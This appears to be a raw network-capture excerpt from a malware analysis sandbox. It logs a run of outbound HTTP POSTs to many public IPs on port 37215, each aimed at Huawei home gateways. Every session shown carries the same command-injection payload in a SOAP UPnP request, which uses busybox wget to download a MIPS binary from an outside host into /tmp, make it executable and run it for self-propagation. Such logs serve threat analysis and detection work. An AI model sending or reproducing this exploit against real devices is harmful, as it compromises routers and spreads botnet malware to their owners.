                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1820192.168.2.1355302197.43.70.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544301987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1821192.168.2.1332918197.212.194.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545006037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1822192.168.2.1336546197.139.56.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545007944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1823192.168.2.1337790157.252.127.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545032978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1824192.168.2.1333396157.19.16.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545084953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1825192.168.2.133303294.57.84.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545147896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1826192.168.2.135042041.213.38.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545150995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1827192.168.2.1346604197.170.125.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545166016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1828192.168.2.136059041.246.222.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545510054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1829192.168.2.1356398115.91.221.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545542955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 